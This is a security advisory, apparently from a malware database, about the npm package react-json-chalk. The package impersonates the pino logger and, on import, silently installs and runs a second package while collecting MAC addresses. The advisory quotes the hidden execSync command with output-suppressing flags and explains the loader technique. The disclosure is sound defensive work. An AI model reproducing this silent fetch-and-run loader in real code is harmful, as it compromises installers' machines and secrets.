MAL-2026-4792
Malicious code in react-json-chalk (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77) The package is published as `react-json-chalk` but its `main` entry (`pino.js`) impersonates the pino logger (homepage `https://getpino.io`, bundled pino source tree, misappropriated description). On `require('react-json-chalk')`, `pino.js` immediately loads `lib/writer.js`, which at module top level tries `require('react-pinojs')` and, if absent, executes `child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent")` and then `require('../../react-pinojs/pino.js')`. The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes `react-pinojs`, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same `lib/writer.js` defines `getMacAddress()` which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.
## Source: ghsa-malware (252715cc7923480c7866ec9ba22f17e136bbc2fc86342ef3175998919d365e9b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Are you affected?
Enter the version of the package you're using.
Affected packages
0 No fixed version published yet for react-json-chalk (npm). Pin to a known-safe version or switch to an alternative.